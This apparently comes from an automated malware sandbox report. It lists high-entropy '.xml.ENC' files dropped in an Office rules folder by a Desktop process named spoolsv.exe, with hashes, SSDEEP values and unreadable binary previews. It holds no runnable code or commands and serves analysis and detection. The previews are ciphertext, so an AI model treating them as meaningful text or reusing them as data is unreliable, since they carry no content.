                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..8...$7b..Z..,6s t$ln..rK..X&<cRO..}2.aM....d..'R..8W.a..W..D....2.... .?.b..nwvLQ...C.SY(.<].oB....]..16.~.!.....1Gp;>.f...3..RH&..;..M{...4v...>`\G.k.(.i.9.{;.....>...M..........{.....K.B...b.R...).....GiS.n.)S u$....U(.S..cv.s....+.#.$[p,`.|............. !......@.......(.ni...8.....*....@...Id..g.......o..1..*...W..._.2.>.J.4uw..X2.F......._Zb.5G.0..9.#...N.ex.4...f`.........Ss.<.>........VR..j..#...=..M.}.L}o........Z.]{.b.O...G....#.kT.#...S..Jp.%A..S....zU)...hm^aH1.8..!..[]Q..8..-...T.|.!G@D,.55.B=q...."bj.0`,H~..4.C.N..k....IT..?."...P.53z..U.8%.............3..LV.*...$.>.CeZ..k.wi...U~....+N.EW..z.....n.~t.+..Z<.@.CG.....@..C..f...8..4.O.en3.ot...~...t.d.._.p8...$4&%7J.7....e....b.1T...i._lu.&...*..H../..*q......G.......l....d..s...g.R....Y.......g....[.....N.B...(.}18..(.ao..e......L..^...u...<|..#.>a.BL.7..*... .....t.4..i.2x..LJ...D........../Hv.prcc.+.Z.2Qv.?....J..4....cR)bj.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11289v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3872
                                                                                                                                                                                                                                                      Entropy (8bit):7.945128136325815
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++TPFt4HsXsHELXS+62RnQiZTVt+x7qeVb4zfqzYNjOCjqdiWQI:++jFdXsG22Ci3t8H4Ewq9T
                                                                                                                                                                                                                                                      MD5:767C91606381E2BFFD6C12838F1F432F
                                                                                                                                                                                                                                                      SHA1:705DCF32249FC5C59FB9A99021FA23D4AE37D0DF
                                                                                                                                                                                                                                                      SHA-256:3E169A47DD51D871EEE298162812142A17F84E2AD3AABA1CA906858DFC68D2E6
                                                                                                                                                                                                                                                      SHA-512:CF786EC500CFE66A58D71E00B756AB0256FF89284C6395CD2DD8D30323033DB26346DFDCE51080F5E86474A2DDE1B93E96FD13B327547D1982FBFEF80DECDDBB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f|.O....`T=m.z....t.1.^.S....O...;.[>...-/+..7.N9.w..._P=..z..nl...1.F.h....R....|.,A. .w.2.......[aV.!Ox./.9..}...Jx.....4d..?..wEc....' .....3..Z......9.;...8*6.....i.4.p!.8qp..E.f.._y...[.V.......m.&^.)8i>.s..o..5.ha@...E........w.V....*.-.E..7.{.b..B..?....!a3nV@a..g.?0.d.J4...p.".....NC..<..O....4........'0.6..Zj.\....[^{...He..9$.G.~.e;.^.rXA..".VW....o5`b.^......<.J.m.-'....N.K.[kOy.~...dk..%n..>Z`.G..E........gR.^KO(F.. ......X.d!...ZAc..b..H1.6.9......m...JJ}`.q....[..#...6.'%.F.C.O.....P.K..\vl6..{N..w..y...I:[.U.r.cU@..Ev.bM......r.L..Z.)....6|... k1:5h.D..,..$. nt..8...e._.I..eC...-...h......w..z..&0...W.5.V.j'..!.R].J/t.h......0.r.......f.U.3....C..Q.w.A..\o.Z.3;...E..D.........1.Y..h.$0.).Y..K.gD*.Jl........<{z.......~u...o.R2..3.........3/..i.$./.c..|5.yk...R.f\4....5y.0..~.E..G?...(..\..R.:*."......V..Z[.:D..n..EIc...2..q<..#.....e..b.]...G...n.=V.\m .....k...n

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4288
                                                                                                                                                                                                                                                      Entropy (8bit):7.950137785215342
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++GubnLiB/j/zfsMskdoSAMXiHglMnBINWKYOFGN81hoFi+fa:++GA2B/HMSHiHpoYOMtFit
                                                                                                                                                                                                                                                      MD5:43361C3A2D2D385C9D93084C87E4E0C2
                                                                                                                                                                                                                                                      SHA1:C23B7C1EE4DFE0CA3A9455FA987690311938557F
                                                                                                                                                                                                                                                      SHA-256:E8E52A47064FA34ED4BCC960202395CF5EA47EDFFA602D003E0E369DE13C6488
                                                                                                                                                                                                                                                      SHA-512:8801D1746DC31B0BBBDB43D197845E94AC2C16C87A4817B7C1712659BAA7E0BD0CAACD0B899AF3A5A1D86553CBCF8418F75A1562D63C707E2BCD5C54E590D799
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.6S..4.E..vw2.f%.?..H...d Y........E.M.X(..3...%9..1gp.N|.#.?....~..8.).....l......`>.(c.t...j.g....K.Jc.. (..*'.k..e....O......R.J.G..0k`%!VrqY..>.H..2......*.H.}.....:.Y....F....L.....asl.w>..3E@..T\~d.%K.5...L.O.....Kn.!....X...v.kW.....:.S#RN4z"..A.[...J>....ds:.....W.\.F.B...{./K...Al..A.f..W...>..q.......0. /$f]......C....5.....a..j....q 43).n.............S.......B5.....*.h.i...U......tW...E,...Z`.G..-c...OA...DT.=.......BG....2GH......@......@..w.H.=.el.}.<.%.$Z..6..5"&.M#3.... ...w..~.5.2[".X.....x.~.z..7...-Ri.<.0W.p}...uh....O..h..+.8m&.n.jH.+..........h...U.?..K......I........Ym3.J..=p.........9c.m.w~?.1:[.8....y"g...)=(......~...%.. .....BR.hF4....?..#..r.s...97.)............M=.gE..3......A.TfN.~..\...i.J.n.GzD.s......<.m...v_..4....|... ..._....0..=...$...y.....^....Aol...L.....|KwFc}.r...f.....!...k`..@G....r..Lu..gi_.Y.,./........f1...fp..x........2"._$A..e...h.5.....3..g..~1#..j

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11302v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2560
                                                                                                                                                                                                                                                      Entropy (8bit):7.926456795864041
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++bSCDk2HtZr5M3INsHsfk4rFqAM+ph4bJrqlIABL1+ILqu+N:++BDkqtnM3I2b4rY+QdrqjI6Z+N
                                                                                                                                                                                                                                                      MD5:A7B575305A51030940DAC86A4EB5908D
                                                                                                                                                                                                                                                      SHA1:332E42E9B6CF1D8583830A4528BB2DFAE93D570A
                                                                                                                                                                                                                                                      SHA-256:8B8A1E6F0A1924E2A8118373A3C79376F699ADF2808FBD0D822E7EDE10047E7B
                                                                                                                                                                                                                                                      SHA-512:923DB75D29BFFAC44A058D36636A34FDD90034FCB52C9128D6D61379386DF8696891DDA43EB5659FFD147174D2BE2322792D4047B8F50F7C31E021760AA39B0B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f2.9o............&} ...%....e.......&.....mH.T..8.....?~H.Krt...7...*.>....!kWtIf.M.=.....=....Q9l....%..A....ua..Q.^Q`...qA9.......],1.v...7......C.:1..t.iy0CkLq.?....D.Q...~........V.7?.q...Wp.....>*J.<.._Hu..{..k[.........Ae.H|..N$...#..F!.`.X.|$g].C.D2.T ....R`.....#.M......{.@t...].C...n4....u.U\...9..n.q.^.4...s.>A4_.6H..Y..;<......j.%b`..#f.7.E..}...P.Y..b...l....^L....#....al&6.fy..o...j........W...`.{..%.6.d.....T.N]$......lhb3t.n/bz.O...U....f....A.w...0V.+r2i.../..\...;.#P.......rn..-....X..;..|....$.e...\W..r....;Z....O..dkghY...... ..+..../.. ..Ak....<.~XE.K.. ..A.F=.........8C.Qm#.O..+tB... x..'\.I.....r~KG..[.,..b.!4?.......{..~..I@..J.^.k.R.o... ."a.L.9BZ...-...C...."A...=j.m...a.]..P..R..n@.a3v.......)&.!.i.jsc..`+k.K...L....O3'S....... .;..p....bM.gqO..q"h..N...2..a(.P..j..|.{..T.n..P...8..N\..W...p.D....u'=3"..{L.=E.^..X........:.J...l...N...\.....5.i...e..Y8.x...*.s...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11362v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5520
                                                                                                                                                                                                                                                      Entropy (8bit):7.965919030905723
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++MM8yJbHULK9VES5yF5N2QK2stv7dfQtaA4pFqW7wWbOr2HcO:++MM7J7UMr2cytaA4CuOw
                                                                                                                                                                                                                                                      MD5:1F4F54F5C73EAA4A881551086AA38282
                                                                                                                                                                                                                                                      SHA1:5A6CFFED48A35DB8B6FCC3D97B186883CC1260DB
                                                                                                                                                                                                                                                      SHA-256:C1EDB48EF99CEE99D57E93B719251482C2D4A40BC460A231B928B8CC3740983D
                                                                                                                                                                                                                                                      SHA-512:5ADB634544764634DA380243C87C3F0A7F69CF4EF77DECE325F86CB5C7A739DDD84EDB8DE8869B2D884F0B3AE0E7F8DA1506A97517FAAC91C8EEEE806E88923E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.!,..J.,18...w-.j.[.N..!...4%..w7.>.....d...u..V7......"u..1K/..p...(...I.\$..@=.c.S*Q...;...s..M..,Y.z..O..L..v^...-....LH..TA.i5..p...D5.|.Q......'.o..n.........xIT!.7.....z..D..HJ..QQ.wL.....M..+x....Br.9...7..B'.<...d_....C'..6.O]@F.T.4_Gn.-K.Re!.......,..K.9z=.s7l.-.......B..........P.I... ........Y..=.N.-..BIl..j.*w...J...l..i.....l~}\.</H...#..JL..Tb.M.$O.v]^...w...(.......{`.|....Iq..\..N...d.@L[...y..).F.........[....Dd...'...._.#..T.J..H.(U+..v..I.z...$.J.....t.5N.hl:...-.jb..C..u(..Vg{......C>...v..m.%...R$/=.W...}...4....5Y.,....U......2..I~'$D.1.....I....D;..%Y%..U........Bd.1y(B.....<....>:...(..x..^..rZ.....h...*_y......)....6...n.....nE.SWP...,.DL....,hK......=...f..M..*...e.\.!=.A.\.qA..\..rI=.BG...Rq.xNc....#....a/..(_....D^~......w.A...*q/Z...h.o.O':..C^._B..>K.\...{U..x_|...h[@(jG~@@.8rl.Mf.#..^....4.*...m.x..............ac......Nhm..v.......#;.^.X....Iu'.....By....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11369v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                                                                                                      Entropy (8bit):7.890823153596271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++CmxfN3WMkSSjADxV/jR7BrNTEAXxYVvRiVXNVykPi2767GW/WP8CJ3lnjJ:++CEW7SOA3/rBDXxYVvcNVyKi2KZCl
                                                                                                                                                                                                                                                      MD5:712695BD21746419D6C6795A28B3E58D
                                                                                                                                                                                                                                                      SHA1:CCD085F5D982AF691828C0E615FF33BC3ACC6960
                                                                                                                                                                                                                                                      SHA-256:5C274E71488C41363CB587B138BC4293EAC900C000803DB824309B33A1EF553C
                                                                                                                                                                                                                                                      SHA-512:2D5263075CA196381561F939C50B664856F545C0012595477E5A18832C62C0C4A283EB023834AF67D9C8D4C6CA73FD9A71A359D3E7D01E0F9DD200A03FBCA979
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f{cU.....\....8..7.}..!..vM......o.P|....'.K.G.!y......|q..n,....'(.R.*...x.<...az.Q5jM.r.......`..(g,pPeE9..Y.7.=.....a.I..A..x^J.@..R..$.c..\%.-.9j.q.x-...N..<~.7.2..4l...F.fwb.N....&..Jx.F.b....|n...f...*..T$5.qa}......r.!.i.....]..=..Z.W...'....(...Bt.ZN....*>-...M.;z..=.-......AB......Nl.`.f.J...-....V._....b.r..D-.Dtr.j.}. :...\+........QQf.M....x....;...........]i..7.P.9..u.....[.m.....PH..6.......(j<.\....9$..........jl.hQ;.....sB`&c.2j...F4..:~.(....m.:0p`...V."'..#dU...+..wu!.SpK.8.P..[....e ...X...GO.$.~QC.,-..E.gC._....Y...;l.Alo..@s..Y..lp,..{.].....t.E.ivh....t%....Ea|Fx..(...@j..|=<N.D9}.M..3zD'...0..H....D9.#o..U.'`!....l..r.]T2.i_T..]..%(l.t.3......).!.k..24.=.4.......z..?..9....5..m..F....w6,...\.....l.v..cA4...Y.BbM$.....T.F><.4.^..f.^#.P.n....o.%...D...., o..W{.R.e..~.r........y.v.p."9j.6................-.m..@d.k........<..5....?M;.3.&...)..\2/mU..|NO......(y..?6..&g..t.SA?k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11370v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):672
                                                                                                                                                                                                                                                      Entropy (8bit):7.693951003823918
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7V7QV0rdUk3YQEFC4sMlGPXbwjH+wpBzvShM3rG+b+TH4+O2zWuCFEidZT/:++JMVVkYjFC4sMlGPcjH+wKScdzWY+M2
                                                                                                                                                                                                                                                      MD5:C34BAD89C73511A55CBCC5BAB17529A0
                                                                                                                                                                                                                                                      SHA1:1544B789EA5193DDC1C633F5F13F085FA2421E57
                                                                                                                                                                                                                                                      SHA-256:A3395E87D3F1FA2274AF6D2E3FB21002E83314F1B47FAAA017DC5D53FAB540AB
                                                                                                                                                                                                                                                      SHA-512:3D31143E7CBBB4F68B5DDAE5E0B67E5E08861E346B974B62AC943CABA1FF2D935E3AFEDF24E092922B5E10F8CC94A1FDED18A0D1C01A848B2B4A0D8EADDD3C58
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fl....i."..:A.V..|`..l.B..ov..Q.Rh......1gk........m...Ug......&E+.4&wV4x@..Y_..i.'..........Y..t...K>@J.....c...Q.A}..x..a....g.....'....:...h3Iz..H@.juy(e]..\...:....6m..L.../.....Q.z..}.v ..../..M..j.$k.aS..\..R...n.....V.zx.e.m./.%..w.......C~.%.S.....m...46A.]h.q........K.I=...n...........g...: a..[<.~N._..x........M.S..iR+JA....8=....e.?x..^..O.....m...^3...p..cF...c.S...|.N..C.g.6..ej..^.\.......L.D.......@......E....iP.q;...q..f.d.........+^X.0S........P9f.../..m.,v...7.=..W*;...N..A...... ......IA:.C..........25..<9.?..|O...$<.e.i....9..#{..}......3..d.T\...._.3PE#D..$R..../....uo.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11381v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2416
                                                                                                                                                                                                                                                      Entropy (8bit):7.925767986387155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++49+gRpc4y6wjbu+X+N8WDNfBnHPpDsgUydryO4TYCTzVuGDymYlK:++54pc41wjqddDNfBxDsh9TYCnDyzK
                                                                                                                                                                                                                                                      MD5:492D70C1C5C047A1B90AFE4E2BF151B8
                                                                                                                                                                                                                                                      SHA1:AEA2466BC9F386CCB97B6B076C4D1B73FBE10FA1
                                                                                                                                                                                                                                                      SHA-256:1705B90225404C41E1DE7167EF51FBCFAD53791723289131DC8442D22B44F779
                                                                                                                                                                                                                                                      SHA-512:27203681DE6228AF10715E584584B95784D2E9F15E4C61496C848E7FC07F99F784A4F9B368097F42F37EE55FEED14A64784CA4C28138891A43A501F2DA53EAF2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.....<..g..6W.B).4..7.?..G.P.8h.?.....?.0.JP...?...'..|...n....8...NR..q....(....f....{o2.y.2Ee.y4.t...O.....}^.....R..|c=. ..k.......p[6..`P.{.g...@Y.._......u}_.0.j..N@..-.........!.C. .$.H...W/.u.>.....]..j...\.;4..\-.(.B?#>k.).p..'l.".?.|...A.d.5..._....4:.K..{J.0.....6.Re...+e.....m..H..r]..P.e.D..=....@.V...p].cp.i4.S.7.......|.mt:.l..A..UX.#...r.\.<h.Z........C....s/...LA.0....y7...E..C...\.\.M.f..z8...u.w.^E.C...PB..rr..!.^3q.{y...N@1.J?........q..'..sX.-................U..d*.PBoa......MUh.vq..d.HuB.-....._...*|...t....o....:...K..k.i....v.-.,y.......nE../.KF_H...y*...K'.h....u.(.z.=PN... ....^. .......16pR(Z[........ =..."w...n....4.X......M...... ..vS...v.*...:. ..,..$B'.i...>J.[:..vfo...rL..@STC.%(..!.V...@..D.....V.t....lc..2^R.X.......pHW.D.2.".p..O/z.>..f.Df^..3.p.M......6.Z...(-..A...~.M..2...v.[@.;.-f..I@.G....XD.........H.;......>f.U...5.8...W......a.../..v....e.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11446v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10736
                                                                                                                                                                                                                                                      Entropy (8bit):7.98180623703194
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++/1rnc6wmWj445g7Tk4LU8jUCywEmpmpHFYKM+l/187HrAMFAA7I2uj8f6pNaak:7KQIKTk4LhdPgHFYKM+l/18LN+mI5j87
                                                                                                                                                                                                                                                      MD5:0E91C51406FC74A69C2189590A06E8DE
                                                                                                                                                                                                                                                      SHA1:B8C21D38559407278E1ECCDC2864D7D065022366
                                                                                                                                                                                                                                                      SHA-256:DC23E3B1A369A627FD6905B9A270755C7528BBA0CAA0561859C90F96C03B7850
                                                                                                                                                                                                                                                      SHA-512:243B70C10C345CBD7767D82A02AE478F11E2C8C9AC6EDBAE5FC24806C3EDA6206AA995A247C4941E09E7B36318856AA349833382C752868DFA913FFBDE0C26BB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f-y.6]=.:.1..xt.+......<a.e..{o...;N..n.K.wa=i...{...<.N.E..a.?[.|..z^....-W4|"..t.w...G.c...K......cj...B.v.z..\.....Y.. .nH..P.....=1jr.nv.V.89....M.3..<.U>:....m|7?.q..j.x)k.:P(.-...S..}.F`.I....".A..Z8...c.q......xz....n...,nfv4.=.....9...r...#..|.Ro..F{..E.J0..4...HR..o5.....f..\.-.0~.g.@..a...i.y.iu.w.(....#........%r..k..I.l...N.Lr.0...:}.....HoQM..........\r...*.9..LL.. M.)..q.By.p..C%..2.%......5.*..2+.|.Z.. .].4.$D.."PP.e+..7,..Ym..(.K.f|.+g..h..Q3.o...K...Q{.b.......E.h.7.I..z...H#.x..4^.SJ..........{...`..7.a....3.6....."m.q...gV'yk:U.ZA.'...p.O"Hx.^...g8..E..uOD5L.9..BP.j..! 8......|4.-$\H..$u.7.7..I.".)...O....U..w.].{...@..~.]_V..X.{.....Q...Q.|..t$QS=.,b..jlJc4Jf.&yB..P(>...W..p..}..'..*.MI...n.t.t[......E.}......C.....c....6\28.(..|.<d.D.l"......=.EO>..41_d..8.>..L......"....@{.8....n1......uP.....2..+C]..X..-Fv.~..._.x..>...>./:..`..@<..m.... Q.I...;....P...M..../..nH...H

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11464v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.580562446994644
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7trFBxgrIS9CpTeLNFvx52J+Fbv0NSlZZIJr:++5rc7CpSppxo4eMUJr
                                                                                                                                                                                                                                                      MD5:D7B9B9E8A1020A9746F518DAE2431BCA
                                                                                                                                                                                                                                                      SHA1:DF90A466BE0D2DD2BCCF6B7AE8CD795F457C1B1B
                                                                                                                                                                                                                                                      SHA-256:6DBD397B67EFF661958BBB7A77F2A03DEC1CD4C3E3C253DF84009F17A591EFD2
                                                                                                                                                                                                                                                      SHA-512:086A747D6C41EA0F319DC68ACF045635A407DFAE526A81CA82DBBDB37779CF5B080BE38E6C6F374F01739C06A166E4DBC3A0034956A103B743F5C96C0F8B4658
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f(..WN.x...9.\.x....A.>j?./MW.g.i.[.c.S.|..3<.Det..f7...M_m.......Q......_P....`.$5.8Dvu.?....Y.7.5.;B.X<mwF...ch6.^......Sf.D.mh...I.............f..r.u.6.M....._.&.=d.va.......v.`.\h.[...U.|...|.!.&..gH...)..l.. ......-$..V.V...\.)....r.<..5.W:_&....6.?...G........|{...3.-`.......k[..kB......]>...4q...uu.:.\[d.)......)M...s...`..~.Ym.. \9M..._2..#....o.2.U[V..!..$.....|...k..8...E..}.X..N.=..zC....)b-%....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11498v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.470200994554516
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7fOrent7Z6IHyDRh1s/gLwRPW9YWdT3n:++TOrQZ63RAoZzp3
                                                                                                                                                                                                                                                      MD5:F5E2DD9E660D8339CD4B72CFB4128098
                                                                                                                                                                                                                                                      SHA1:9B3CC839E1E1C8D8925DF4E9B3F58BF66DE9FC92
                                                                                                                                                                                                                                                      SHA-256:390933DA9DB0F6FF493CBCC67792E99294B8585A78FE9334E394310C6A4E88C8
                                                                                                                                                                                                                                                      SHA-512:AF2C8219189FB1DDB8FB1EA4D0661020C72B8EC69828CB19551F5E6DCF247D90C6D9A9122E5855CF67399210CE91E1AD32504330A24ACE423BD417EEA525EF2B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f^....t.:.M..m.z|T.T...E..S5.y*..P.....@>.+.-.j.QS.T...eW..K..q...0..u.......+P{g.X.P.Yn.u..t.YA.K.}?.....a.H~*r...p?5..9.i........@]...+j..l.2I...9.%0<..q.......IV..RP..u.....|...}..Z..._+.b.W-...0.\...cQ..L-..h$Eo:.`9;..7.]>4..L~p._P.a....N......).Z......~..i.9.~2...j.tDA'Gs.-W..8...t..1..>. .6@.YJ@........^...bW9...{~UrT......;RP..R.g....kI

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11499v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1456
                                                                                                                                                                                                                                                      Entropy (8bit):7.868626280530653
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++7YdzRnm+tDmpDvybmcP9IcepyrOhIJXhJo9v1uSPdEIyoztZX2o7mp7tzGaiW1:++OZDm9vyaKegCh4XhJ4sSPHyoztZ/m9
                                                                                                                                                                                                                                                      MD5:3B0AFEEA0295C9BAD2FD5A0C0C33EB43
                                                                                                                                                                                                                                                      SHA1:4F17C0B33FCC636B694173C261E861CB498C4B5C
                                                                                                                                                                                                                                                      SHA-256:7EC3D1F0B38F6CA20AA6184215805D8C8E04CB044CDB77977012C48949B965FB
                                                                                                                                                                                                                                                      SHA-512:F020F909B974616137E6BD7A6F63285B364261CB968213342085C621B8E00D7B486FCC5AC9534FBE0363682D826778DD89006B9776E6C7E1BC8CB8E797DCF97D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f~q7c..x..r..O..<..A.'.......5*...Z..a=4...!..N'.....D........yaP.....4...P..9...]O^..|..%....(^.........u.^8F./.....1..9....)y".,+.Z.{.v.(.3......]....d...9.....%.m...T1H..`...&5..=.K...6a.N.G......>...<8~I....|.l)r..q...}.`R.!J3.SG..*....).+M...i.2y"Yt.....p.I:.5..:....e.h...7.I.-..-#..(....)..i{..G...O....[..K...S..^......JJ$..V;U.G^e2WG!....O.w.L.w..#8q...r..Y.].R.1..KA.N...0ek.Q..t0.&.v..9.e..H.-8.....9.N{..%..W..]...(K....4....E..5^..E.......r....Ros3.R...xJ.._..zq...~..WE.)...z....@..b....h....T~y0...j..p}.C.....f..,.G1..t9...T<.X...1.kr...}o'....#..z..@.c:.!3......8,6.|......gU..5.....O.{.-.B|...v..}...;....`]._.<t;..-}5.(z.M.)..wR.MM..t.k.b!|.....K..N9..t......'e..%y.(..6+.Q.sj..Pt..:....j......vs.....Ab.s{>.<....2.VGZw}.V...#...:f?...G....X.....Z.0.7P}.Z.V...Qk....9 z..&.".=.a..FFf.F....3*..p..a4.......A%=....V..[..Y.J..iC..M...s...U+.....y..O4....~.;I;....%Y......J...n....On.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11500v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.651814124589815
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7f9i/vlopGNofeuWh38pZROUN2ND/EM2qlQ05EPPzL:++IXOwe5Wx8p7qxcM2qZ5mPzL
                                                                                                                                                                                                                                                      MD5:E2882CF93FDA469C6476CD8963139FF8
                                                                                                                                                                                                                                                      SHA1:37FBD188C38346E810F8B80F1FED75B971701BA2
                                                                                                                                                                                                                                                      SHA-256:4CFB9DDEA9AAB4AD81D1D2581280C53C11C73B7128A6D712CD8159C59A1256EF
                                                                                                                                                                                                                                                      SHA-512:1B6FF1E454D5AA0EBC94B7CA9C782D62F527DDE836D2179DB24512B4631CA9D80622FFECBF511D2A099FBDD87C07A7D1B9E0E89432B78F72EC6ED820A533EE1D
                                                                                                                                                                                                                                                      Malicious:false
